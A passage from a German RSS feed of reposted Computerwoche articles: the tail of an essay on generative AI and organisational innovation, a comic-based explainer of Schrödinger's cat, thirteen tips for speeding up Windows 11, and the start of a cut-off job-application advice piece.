<p class="wp-block-paragraph">Ein wesentlicher psychologischer Mechanismus dieser frühen Konvergenz ist der sogenannte <a href="https://de.wikipedia.org/wiki/Ankereffekt" target="_blank" rel="noreferrer noopener">Ankereffekt</a>: Da KI in Sekundenschnelle plausible Ergebnisse liefert, wirkt dieser erste Entwurf als kognitiver Anker. Das menschliche Gehirn orientiert sich somit unbewusst an diesem Startpunkt, was den Suchraum für alternative Lösungen vorzeitig verengt und so die Innovationsfähigkeit schwächen kann.</p>



<p class="wp-block-paragraph">Führungskräfte stehen deshalb vor der zusätzlichen Aufgabe, produktiven Widerspruch bewusst zu organisieren. Kritische Rückfragen und konträre Sichtweisen sind das notwendige Gegengewicht zur KI-generierten Konvergenz. Und: Organisationen verlieren selten ihre Innovationskraft, weil ihnen Antworten fehlen. Vielmehr, weil sie aufhören, Alternativen ernsthaft zu diskutieren. Eine höhere Geschwindigkeit im Lösungsprozess führt daher nicht automatisch zu höherer Innovationsfähigkeit. </p>



<p class="wp-block-paragraph">Entscheidend ist, dass Organisationen weiterhin Räume schaffen, in denen unterschiedliche Perspektiven aufeinandertreffen, bestehende Annahmen hinterfragt werden und neue Ideen entstehen können. Mit anderen Worten: KI erzeugt Konvergenz, Innovation braucht Divergenz.</p>



<h2 class="wp-block-heading">KI schafft eine neue Realität</h2>



<p class="wp-block-paragraph">Diese drei Bruchstellen verdeutlichen, dass generative KI nicht nur Arbeitsprozesse, sondern auch die Grundlagen organisationaler Leistungsfähigkeit grundlegend verändern kann. Wissen entsteht anders, Entscheidungen werden anders getroffen und Innovation entwickelt sich unter veränderten Voraussetzungen.</p>



<p class="wp-block-paragraph">Je stärker KI in den Arbeitsalltag integriert wird, desto entscheidender wird es, die genannten Bruchstellen bewusst zu gestalten. Der nachhaltige Nutzen von KI entsteht nicht allein durch den Einsatz der Technologie, sondern durch die Fähigkeit einer Organisation, ihre Strukturen, Lernprozesse und Entscheidungsmechanismen an diese neue Realität anzupassen. (fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag wurde im Rahmen des deutschsprachigen Experten-Netzwerks von Foundry veröffentlicht. Lust mitzumachen? </strong><a href="https://www.computerwoche.de/experten/" target="_blank"><strong>Jetzt bewerben</strong>!</a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Comics, die Quantencomputer erklären – Schrödingers Katze (#1)]]></title>
<description><![CDATA[Das Prinzip von Schrödingers Katze – übertragen in die „reale“ Welt.
Yuval Boger, QuantumBitsComic.com



Quantencomputer versprechen, einige der schwierigsten Rechenprobleme unserer Zeit zu lösen. Doch dabei ist es bereits eine Herausforderung, die Funktion eines Quantenrechners zu verstehen. Um...]]></description>
<link>https://tsecurity.de/de/3690657/it-security-nachrichten/comics-die-quantencomputer-erklaeren-schroedingers-katze-1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690657/it-security-nachrichten/comics-die-quantencomputer-erklaeren-schroedingers-katze-1/</guid>
<pubDate>Fri, 24 Jul 2026 06:08:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Comic1_16_9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Quantencomputer" class="wp-image-4199502" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Das Prinzip von Schrödingers Katze – übertragen in die „reale“ Welt.</p>
</figcaption></figure><p class="imageCredit">Yuval Boger, QuantumBitsComic.com</p></div>



<p class="wp-block-paragraph">Quantencomputer versprechen, einige der schwierigsten Rechenprobleme unserer Zeit zu lösen. Doch dabei ist es bereits eine Herausforderung, die Funktion eines Quantenrechners zu verstehen. Umso besser, dass <a href="https://www.linkedin.com/in/yuvalboger">Yuval Boger</a>, CCO beim Quantum-Computing-Spezialisten QuEra, das für uns künftig einmal pro Monat übernimmt. Und zwar in etwas unkonventioneller, aber verständlicher und unterhaltsamer Form – mit Comics.</p>



<p class="wp-block-paragraph">Mit seinem Comicbuch „<a href="https://quantumbitscomics.com/">Quantum Bits</a>“ zeigt der Manager, dass sich selbst anspruchsvolle Physik mit Humor, alltäglichen Vergleichen und klarer Sprache verständlich vermitteln lässt. In Teil 1 dieser Serie widmet Boger sich der wohl <a href="https://de.wikipedia.org/wiki/Schr%C3%B6dingers_Katze">berühmtesten Katze der Wissenschaft</a>.</p>



<h2 class="wp-block-heading">Die Katze, die Quantenmechanik erklärt</h2>



<p class="wp-block-paragraph">1935 entwickelte der österreichische Physiker <a href="https://de.wikipedia.org/wiki/Erwin_Schr%C3%B6dinger">Erwin Schrödinger</a> ein Gedankenexperiment. Eine Katze sitzt in einer geschlossenen Box. Ebenfalls darin befinden sich ein radioaktives Atom, ein Detektor und ein Giftfläschchen. Zerfällt das Atom, löst der Detektor das Gift aus und die Katze stirbt. Zerfällt es nicht, bleibt sie am Leben.</p>



<p class="wp-block-paragraph">Der Clou an der Sache: Der Zerfall eines einzelnen Atoms ist ein Quantenprozess. Solange niemand das Ergebnis misst, beschreibt die Quantenmechanik das Atom als <a href="https://www.computerwoche.de/article/2794214/wie-quantencomputer-funktionieren.html?utm=hybrid_search">Überlagerung</a> verschiedener Möglichkeiten. Daraus entstand die bis heute populäre Vorstellung, Schrödingers Katze sei gleichzeitig lebendig und tot.</p>



<p class="wp-block-paragraph">Genau das wollte Schrödinger jedoch nicht sagen. Im Gegenteil. Sein Gedankenexperiment sollte zeigen, wie befremdlich die Gesetze der Quantenmechanik wirken, wenn man sie auf unsere Alltagswelt überträgt. Für einzelne Atome bestätigt die Physik diese Regeln seit Jahrzehnten experimentell. Eine Katze hingegen erleben wir immer in einem eindeutigen Zustand – entweder lebendig oder tot.</p>



<h2 class="wp-block-heading">Die Quantenwelt im Alltag</h2>



<p class="wp-block-paragraph">Wo also endet die Quantenwelt und wo beginnt die Welt des Alltags? Diese Frage beschäftigt Physiker bis heute. Für das Verständnis von Quantencomputern ist sie jedoch ein idealer Ausgangspunkt. Denn, bevor wir über <a href="https://www.computerwoche.de/article/2794214/wie-quantencomputer-funktionieren.html?utm=hybrid_search">Qubits</a> sprechen können, müssen wir verstehen, warum die Natur im Kleinsten nach anderen Regeln spielt als im Großen.</p>



<p class="wp-block-paragraph">Der Comic übersetzt dieses Prinzip in eine Alltagssituation. Solange die Rückmeldung auf die Bewerbung aussteht, sind mehrere Ausgänge denkbar. Erst mit der Antwort wird klar, welche Realität gilt. Physikalisch ist das natürlich nur eine Analogie – aber sie macht anschaulich, worum es bei Schrödingers Katze geht: um den Unterschied zwischen möglichen Zuständen und einem gemessenen Ergebnis.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11 schneller machen]]></title>
<description><![CDATA[Windows 11 (ab Version 22H2) schneller machen: Mit diesen 13 Tipps klappt’s im Handumdrehen.
					Foto: Microsoft




Im Vergleich zu Windows 10 hat Microsoft bei Windows 11 einige Maßnahmen ergriffen, um die PC-Performance zu optimieren. Das heißt allerdings nicht, dass es nicht noch besser, bez...]]></description>
<link>https://tsecurity.de/de/3690608/it-security-nachrichten/windows-11-schneller-machen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690608/it-security-nachrichten/windows-11-schneller-machen/</guid>
<pubDate>Fri, 24 Jul 2026 05:19:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Windows 11 (ab Version 22H2) schneller machen: Mit diesen 13 Tipps klappt's im Handumdrehen." title="Windows 11 (ab Version 22H2) schneller machen: Mit diesen 13 Tipps klappt's im Handumdrehen." src="https://images.computerwoche.de/bdb/3388569/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Windows 11 (ab Version 22H2) schneller machen: Mit diesen 13 Tipps klappt’s im Handumdrehen.</p></figcaption></figure><p class="imageCredit">
					Foto: Microsoft</p></div>




<p class="wp-block-paragraph">Im Vergleich zu <a title="Windows 10" href="https://www.computerwoche.de/article/2823259/windows-11-im-windows-10-look-nutzen.html" target="_blank">Windows 10</a> hat Microsoft bei <a title="Windows 11" href="https://www.computerwoche.de/article/2805175/laeuft-win-11-auf-ihrem-pc.html" target="_blank">Windows 11</a> einige Maßnahmen ergriffen, um die PC-Performance zu optimieren. Das heißt allerdings nicht, dass es nicht noch besser, beziehungsweise schneller geht. Zum Beispiel mit den folgenden, simplen Optimierungstipps. Sie zu befolgen kann übrigens auch gewährleisten, dass Ihre <a class="idgGlossaryLink" href="https://www.computerwoche.de/operating-systems/" target="_blank">Windows</a>-11-Maschine nicht im Laufe der Zeit erlahmt.</p>



<h2 class="wp-block-heading">13 Tipps, um Windows 11 schneller zu machen</h2>



<p class="wp-block-paragraph">Vorab noch ein Hinweis: Wir beziehen uns in diesem Artikel auf <a title="Windows 11 Version 22H2" href="https://www.computerwoche.de/article/2816557/die-erste-version-auf-die-firmen-wechseln-koennen.html" target="_blank">Windows 11 Version 22H2</a>. Wenn Sie eine frühere Version von <a class="idgGlossaryLink" href="https://www.computerwoche.de/operating-systems/" target="_blank">Windows</a> 11 nutzen, stehen einige Features unter Umständen nicht zur Verfügung oder sehen anders aus.</p>



<p class="wp-block-paragraph"><strong>1. Autostart deaktivieren</strong></p>



<p class="wp-block-paragraph">Programme, die zwar im Hintergrund laufen, aber nur selten oder nie verwendet werden, können Ihren PC verlangsamen. Zu unterbinden, dass solche Applikationen zum Systemstart ausgeführt werden, kann Ihren Rechner entsprechend beschleunigen. Dazu rufen Sie zunächst den <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> Task Manager auf, indem Sie: </p>



<ul class="wp-block-list">
<li><p>entweder die <a title="Tastenkombination" href="https://www.computerwoche.de/article/2718711/windows-10-wichtige-tastenkombinationen-im-ueberblick.html" target="_blank">Tastenkombination</a> <strong>Strg + Alt + Entf</strong> eingeben, oder</p></li>



<li><p>den Task Manager über die Windows-Suchleiste starten.</p></li>
</ul>



<p class="wp-block-paragraph">Im Task Manager klicken Sie rechts auf den Menüpunkt “<strong>Autostart von Apps</strong>“. Nun sehen Sie eine Liste der Programme und Dienste, die beim Start von <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> initiiert werden – inklusive der Info, wie sich die jeweilige App auf den Startprozess auswirkt (dieser Wert bezieht sich allerdings nur auf den Startvorgang, nicht den laufenden Windows-11-Betrieb). Um zu verhindern, dass eines der gelisteten Programme oder Dienste zusammen mit dem System gestartet wird, genügt ein Rechtsklick, die Auswahl von “<strong>Deaktivieren</strong>” sowie ein anschließender Neustart des Rechners.</p>



<p class="wp-block-paragraph"><strong>2. Effizienzmodus verwenden</strong></p>



<p class="wp-block-paragraph">Über den Task Manager initiieren Sie einen weiteren Trick, um <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 11 schneller zu machen. Den mit Windows 11 22H2 eingeführten “<strong>Effizienzmodus</strong>“, der Ihren PC beschleunigen und zudem die Akkulaufzeit Ihres Laptops optimieren kann. Neben anderen Maßnahmen regelt der Effizienzmodus in <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 11 zum Beispiel die Priorität von Prozessen und Anwendungen, die im Hintergrund laufen. Dabei ist der Begriff allerdings etwas irreführend, denn Sie können nicht Ihren gesamten Rechner in den Effizienzmodus versetzen – sondern lediglich <a href="https://www.computerwoche.de/article/2860610/effizienzmodus-fuer-programme-aktivieren.html" title="einzelne Anwendungen und Prozesse" target="_blank">einzelne Anwendungen und Prozesse</a>. Der Haken dabei: Das funktioniert nur mit bestimmten.</p>



<p class="wp-block-paragraph">Rufen Sie den Task Manager (siehe oben) auf und wählen sie im Menü links den Punkt “<strong>Prozesse</strong>“. Rechts sehen Sie nun eine Liste der Anwendungen und Prozesse, die aktuell laufen. Wenn Sie einen der Listeneinträge auswählen, haben Sie oben rechts im Task Manager die Möglichkeit, den <strong>Effizienzmodus</strong> zu aktivieren. Ist die Schaltfläche ausgegraut, steht die Funktion für die ausgewählte App nicht zur Verfügung. Darüber hinaus wissenswert: Unter <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 11 arbeiten einige Anwendungen standardmäßig im Effizienzmodus, ohne die Möglichkeit, diesen zu deaktivieren (etwa <a href="https://www.computerwoche.de/article/2823167/edge-browser-zwang-in-teams-und-outlook.html" title="Microsoft Edge" target="_blank">Microsoft Edge</a>).</p>



<p class="wp-block-paragraph"><strong>3. Automatisierte Wartung nutzen</strong></p>



<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 11 führt im Hintergrund kontinuierlich Wartungsmaßnahmen an Ihrem PC durch, beispielsweise Sicherheits-Scans und Systemdiagnosen. Das soll sicherstellen, dass alles auf dem neuesten Stand ist, eventuelle Probleme automatisch behoben werden und das Device mit optimaler Leistung läuft. Sie sollten deshalb sicherstellen, dass die automatische Wartung durch Windows aktiviert ist. Bei Bedarf können Sie diese Funktion auch manuell starten.</p>



<p class="wp-block-paragraph">Rufen Sie dazu die <strong>Systemsteuerung</strong> auf und wählen Sie dort <strong>System und Sicherheit</strong> -&gt; <strong>Sicherheit und Wartung</strong>. Hier finden Sie den Abschnitt “<strong>Automatische Wartung</strong>“, inklusive der Option, diese direkt manuell zu starten.</p>



<p class="wp-block-paragraph"><strong>4. Adware und Bloatware beseitigen</strong></p>



<p class="wp-block-paragraph">Möglicherweise liegt es gar nicht an <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 11, dass Ihr PC langsam startet. Eventuell beansprucht auch <a href="https://www.computerwoche.de/article/2860628/installation-ohne-bloatware.html" title="Bloat" target="_blank">Bloat</a>– oder Adware die Systemressourcen über Gebühr. Software dieser Art wird oft vom Hersteller Ihres PCs vorinstalliert – und in der Regel standardmäßig auch beim Systemstart aktiviert.</p>



<p class="wp-block-paragraph">Um das abzustellen, führen Sie zunächst einen System-Scan durch, um Adware und Malware aufzuspüren. Wenn Sie bereits eine Security-Suite installiert haben, können Sie diese dazu verwenden. Ansonsten empfiehlt sich für diese Aufgabe der in <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 11 integrierte <a href="https://www.computerwoche.de/article/2858833/mit-dem-microsoft-defender-nach-viren-suchen.html" title="Defender" target="_blank">Defender</a>. Um einen Scan zu starten, suchen Sie die App über das <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-Suchfeld. Anschließend können Sie mit einem zweiten Tool auf Nummer sicher gehen – dazu empfiehlt sich zum Beispiel das kostenlose Tool von <a href="https://de.malwarebytes.com/" title="Malwarebytes" target="_blank" rel="noopener">Malwarebytes</a>. Anschließend geht es der Bloatware an den Kragen. Dazu empfehlen sich zwei Werkzeuge:</p>



<ul class="wp-block-list">
<li><p>Das kostenlose Anti-Bloatware-Tool “<strong><a title="Bulk Crap Uninstaller" href="https://www.bcuninstaller.com/" target="_blank" rel="noopener">Bulk Crap Uninstaller</a></strong>” und</p></li>



<li><p>die Webseite “<strong><a title="Should I Remove It?" href="https://www.shouldiremoveit.com/" target="_blank" rel="noopener">Should I Remove It?</a></strong>“.</p></li>
</ul>



<p class="wp-block-paragraph">Letztere bietet nicht nur wertvolle Tipps zu installierter Software auf Ihrem System, sondern bietet auch diverse nützliche Inhalte, die Sie dabei unterstützt, Bloatware von den Systemen verschiedener <a href="https://www.shouldiremoveit.com/oems-bloatware.aspx" title="spezifischer Hersteller" target="_blank" rel="noopener">spezifischer Hersteller</a> zu entfernen.</p>



<p class="wp-block-paragraph"><strong>5. Suchindizierung abschalten</strong></p>



<p class="wp-block-paragraph">Die <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-11-Suche führt im Hintergrund eine Indizierung der Festplattendaten durch, damit Sie Ihren PC schneller durchsuchen können. Die beschleunigten Suchvorgänge können allerdings zu einem langsameren Rechner führen, denn die Suchindizierung kostet Ressourcen. Dies gilt insbesondere für Systeme, die ohnehin etwas schwach auf der Brust sind. Bei ihnen kann es zu einem Geschwindigkeitsschub führen, die Suchindizierung abzuschalten. </p>



<p class="wp-block-paragraph">Um das zu bewerkstelligen, geben Sie <strong>services.msc</strong> in das <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-Suchfeld ein und öffnen die <strong>Dienste-App</strong>. In der Auflistung scrollen Sie bis zum Eintrag “<strong>Windows Search</strong>” – und vollziehen einen Doppelklick. Im folgenden Fenster können Sie den Dienst stoppen und Ihren Rechner neu starten. Anschließend sind Ihre Suchvorgänge möglicherweise etwas langsamer, den Unterschied werden Sie allerdings kaum bemerken. Dafür sollten Sie den Geschwindigkeitszuwachs umso mehr spüren.</p>



<p class="wp-block-paragraph">Alternativ können Sie die Indizierung auch nur für Dateien an bestimmten Speicherorten deaktivieren, während Dateien und Ordner, in, beziehungsweise nach denen Sie häufig suchen, weiterhin indiziert werden. Dazu geben Sie im <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-Suchfeld “<strong>index</strong>” ein und öffnen anschließend die App “<strong>Indizierungsoptionen</strong>“. Klicken Sie auf die Schaltfläche “<strong>Ändern</strong>“, und Sie sehen eine Liste der Speicherorte, die indiziert werden. Damit ein spezifischer Speicherport nicht mehr indiziert wird, deaktivieren Sie einfach das entsprechende Kontrollkästchen daneben.</p>



<p class="wp-block-paragraph"><strong>6. Festplatte entrümpeln</strong></p>



<p class="wp-block-paragraph">Eine überfüllte Festplatte mit Dateien, die nicht mehr benötigt werden, kann Ihren PC ausbremsen. Sich ein paar Minuten Zeit zu nehmen, um Ihre Festplatte aufzuräumen, kann in einen sofortigen Geschwindigkeitsschub resultieren. Dazu brauchen Sie nicht mehr als das <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-11-Bord-Tool “<strong>Speicheroptimierung</strong>“.</p>



<p class="wp-block-paragraph">Dieses finden Sie über das Einstellungsmenü, unter dem Punkt <strong>System</strong> -&gt; <strong>Speicher</strong>. Wenn Sie den Schieberegler bei Speicheroptimierung nach rechts schieben, überwacht <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 11 Ihren PC kontinuierlich und löscht automatisiert temporäre oder alte Dateien. Dabei können Sie die Funktionsweise des Tools an Ihre Bedürfnisse anpassen. Sie können die Speicheroptimierung auch anweisen, Dateien in Ihrem Download-Ordner oder Ihrem Papierkorb nach einer bestimmten Frist zu löschen.</p>



<p class="wp-block-paragraph"><strong>7. Schatten, Animationen und visuelle Effekte deaktivieren</strong></p>



<p class="wp-block-paragraph">Auf schnellen, neueren PCs beeinträchtigen die visuellen Effekte von <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 11 die PC-Leistung für gewöhnlich nicht. Auf älteren, langsameren Rechnern kann das anders aussehen. Sollte Ihr PC in letztgenannte Kategorie fallen, fahren Sie in der Regel besser, wenn Sie die visuellen Schmankerl von Windows 11 deaktivieren.</p>



<p class="wp-block-paragraph">Dazu geben Sie <strong>sysdm.cpl</strong> in das <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-Suchfeld ein und starten das gleichnamige Systemsteuerungselement. Im folgenden Dialogfeld “<strong>Systemeigenschaften</strong>” navigieren Sie zur Registerkarte “<strong>Erweitert</strong>“. Anschließend klicken Sie auf die Schaltfläche “<strong>Eigenschaften</strong>” im Bereich “<strong>Leistung</strong>“. Sie sehen nun das Dialogfeld “Leistungsoptionen” mit einer langen Liste von Animationen und Spezialeffekten. Hier können Sie nach Belieben experimentieren. Wenn Sie einfach nur zielstrebig die größten Performance-Fresser entfernen möchten – das sind in der Regel die Optionen:</p>



<ul class="wp-block-list">
<li><p>Animation beim Minimieren und Maximieren von Fenstern;</p></li>



<li><p>Animationen auf der Taskleiste;</p></li>



<li><p>Fensterschatten anzeigen;</p></li>



<li><p>Menüelemente nach Aufruf ausblenden;</p></li>



<li><p>Menüs in Ansicht ein- oder ausblenden;</p></li>



<li><p>Quickinfo in Ansicht ein- oder ausblenden;</p></li>



<li><p>Steuerelemente und Elemente innerhalb von Fenstern animieren.</p></li>
</ul>



<p class="wp-block-paragraph">Die einfachste Lösung: Wählen Sie oben im Dialogfeld die Option “<strong>Optimale Einstellung automatisch auswählen</strong>“. In diesem Fall deaktiviert <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 11 automatisch die Effekte, die Ihr System verlangsamen.</p>



<p class="wp-block-paragraph"><strong>8. Transparenz deaktivieren</strong></p>



<p class="wp-block-paragraph">Ein weiterer Hebel, um <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 11 schneller zu machen: Deaktivieren Sie auch die Transparenzeffekte in der Taskleiste und an anderen Stellen. Diese kosten erstaunlich viel Systemleistung. Klicken Sie sich dazu im Einstellungsmenü über “<strong>Personalisierung</strong>” bis zu “<strong>Farben</strong>” durch und schieben Sie den Schieberegler für die Transparenzeffekte auf Aus.</p>



<p class="wp-block-paragraph"><strong>9. Energieeinstellungen anpassen</strong></p>



<p class="wp-block-paragraph">Mit Hilfe der Energieeinstellungen Ihres <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-11-PCs können Sie Energieeffizienz und Leistung in Einklang bringen. Ist auf Ihrem System ein Energiesparplan aktiviert, führt das also in jedem Fall zu Leistungseinbußen.</p>



<p class="wp-block-paragraph">Um das zu verhindern, rufen Sie die Systemsteuerung auf und wählen dann “<strong>Hardware und Sound</strong>“, gefolgt von “<strong>Energieoptionen</strong>“. Wählen Sie nun die gewünschte Einstellung. Für Desktop-Benutzer gibt es keinen Grund, die Option “Energiesparen” zu wählen – und selbst Laptop-Benutzer sollten die Option “Ausgewogen” in Betracht ziehen.</p>



<p class="wp-block-paragraph"><strong>10. Windows-Tipps und -Tricks abschalten</strong></p>



<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 11 analysiert ständig, was Sie auf Ihrem PC tun, und gibt Ihnen an diversen Stellen Tipps, “um noch mehr zu machen”. Hilfreich sind die allerdings selten – und ein schlechtes Gefühl gibt’s inklusive, wenn Windows ständig über die Schulter schaut. Viel wichtiger ist aber, dass diese Art des Monitorings auch Ihr System verlangsamen kann.</p>



<p class="wp-block-paragraph">Um <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 11 dazu zu bringen, die Ratschläge für sich zu behalten, öffnen Sie das Einstellungsmenü und wählen anschließend “<strong>System</strong>” und dann “<strong>Benachrichtigungen</strong>“. Hier scrollen Sie ganz nach unten, um unter dem Punkt “<strong>Zusätzliche Einstellungen</strong>” das Kontrollkästchen “<strong>Tipps und Vorschläge erhalten, wenn Windows verwendet wird</strong>“.</p>



<p class="wp-block-paragraph"><strong>11. Spielmodus deaktivieren</strong></p>



<p class="wp-block-paragraph">Der in <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 11 integrierte Spielmodus ist sinnvoll, wenn Sie Games zocken. Sobald das System eines erkennt, verwendet es die Systemressourcen vorrangig dafür – zulasten aller anderen Anwendungen und Hintergrundprozesse. Wenn Sie allerdings gerade nicht, beziehungsweise nie spielen, kann der Spielmodus Ihr System verlangsamen, denn er hält einige Systemressourcen in Reserve – und führt gelegentlich auch zu Stabilitätsproblemen. </p>



<p class="wp-block-paragraph">Da der Spielmodus standardmäßig aktiviert ist, müssen Sie ihn abschalten. Dazu rufen Sie im Einstellungsmenü “<strong>Spiele</strong>” und anschließend “<strong>Spielemodus</strong>” auf und betätigen den Schieberegler entsprechend.</p>



<p class="wp-block-paragraph"><strong>12. Treiber aktualisieren</strong></p>



<p class="wp-block-paragraph">Veraltete Treiber können Ihren <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-11-PC signifikant erlahmen lassen. Um zu verhindern, dass es soweit kommt, gehen Sie wie folgt vor: </p>



<ul class="wp-block-list">
<li><p>Rufen Sie die Windows-Einstellungen auf (<strong>Windows-Taste + I</strong>).</p></li>



<li><p>Wählen Sie zunächst “<strong>Windows Update</strong>” im Menü links, anschließend im Hauptfenster zuerst “<strong>Erweiterte Optionen</strong>“, dann “<strong>Optionale Updates</strong>“.</p></li>



<li><p>In der <strong>Treiberupdate</strong>-Auflistung dürfen Sie nun diejenigen auswählen, die Sie herunterladen und installieren möchten.</p></li>
</ul>



<p class="wp-block-paragraph"><strong>13. Windows neu starten</strong></p>



<p class="wp-block-paragraph">Last, but not least eine echte Geheimwaffe aus den <a href="https://www.computerwoche.de/article/2616501/die-duemmsten-it-support-anfragen.html" title="IT-Abteilungen dieser Welt" target="_blank">IT-Abteilungen dieser Welt</a>: Wenn Ihr Rechner lahmt, <strong>starten Sie ihn neu</strong>. Das sorgt dafür, dass der Arbeitsspeicher wieder ins Reine kommt und nicht mehr benötigte Prozesse beendet werden.</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag ist <a href="https://www.computerworld.com/article/1617815/how-to-speed-up-windows-11.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Computerworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 Tipps für Anschreiben und Bewerbungsgespräch: So heben Sie sich von der Konkurrenz ab]]></title>
<description><![CDATA[Eine individuelle Positionierung ist das A und O einer guten Bewerbung.
					Foto: Tero Vesalainen – shutterstock.com




Auf welche fünf Besonderheiten bei der Bewerbung sowie später im Vorstellungsgespräch zu achten ist, wird im folgenden Beitrag erläutert.



5 Bewerbungstipps: So heben Sie si...]]></description>
<link>https://tsecurity.de/de/3690607/it-security-nachrichten/5-tipps-fuer-anschreiben-und-bewerbungsgespraech-so-heben-sie-sich-von-der-konkurrenz-ab/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690607/it-security-nachrichten/5-tipps-fuer-anschreiben-und-bewerbungsgespraech-so-heben-sie-sich-von-der-konkurrenz-ab/</guid>
<pubDate>Fri, 24 Jul 2026 05:19:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Eine individuelle Positionierung ist das A und O einer guten Bewerbung." title="Eine individuelle Positionierung ist das A und O einer guten Bewerbung." src="https://images.computerwoche.de/bdb/3339781/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Eine individuelle Positionierung ist das A und O einer guten Bewerbung.</p></figcaption></figure><p class="imageCredit">
					Foto: Tero Vesalainen – shutterstock.com</p></div>




<p class="wp-block-paragraph">Auf welche fünf Besonderheiten bei der Bewerbung sowie später im Vorstellungsgespräch zu achten ist, wird im folgenden Beitrag erläutert.</p>



<h3 class="wp-block-heading">5 Bewerbungstipps: So heben Sie sich ab</h3>



<p class="wp-block-paragraph"><strong>1. Individuelles Profil erarbeiten</strong></p>



<p class="wp-block-paragraph">Für jede Bewerbung sind zwei Fragen wichtig. Einerseits: Welche Eigenschaften, Erfahrungen und Erfolge kann der Kandidat vorweisen, die er bereits in früheren beruflichen Stationen erworben hat? Andererseits: In welche Branchen und Jobs kann er diese Vorteile einbringen, wo ist er unter den gegebenen Bedingungen eine wertvolle Arbeitskraft?</p>



<p class="wp-block-paragraph">Diese individuelle Positionierung ist die Grundlage jeder erfolgreichen Bewerbung. Tatsächlich starten die meisten Bewerber ihre Jobsuche mit ihrem Lebenslauf und machen somit den zweiten Schritt vor dem ersten. Das macht sich allerdings auch in den Unterlagen bemerkbar – so geht nämlich keine Positionierung daraus hervor.</p>



<p class="wp-block-paragraph"><strong>2. Inhalte müssen genau auf die Stelle passen</strong></p>



<p class="wp-block-paragraph">Mit der Positionierung ist es zudem möglich, das<a href="https://www.computerwoche.de/article/2724914/bewerbungsstrategien-fuer-jung-und-alt.html" title=" Anschreiben" target="_blank"> Anschreiben</a> und den <a href="https://www.computerwoche.de/article/2805221/5-tipps-fuer-die-passende-vita.html" title="Lebenslauf" target="_blank">Lebenslauf</a> anhand der eben gewonnenen Ergebnisse anzupassen. Das ist wichtig, um jede Bewerbung individueller zu gestalten, den Inhalt aber zugleich so auszulegen, dass er sich je nach freier Stelle an den geforderten Kriterien orientiert.</p>



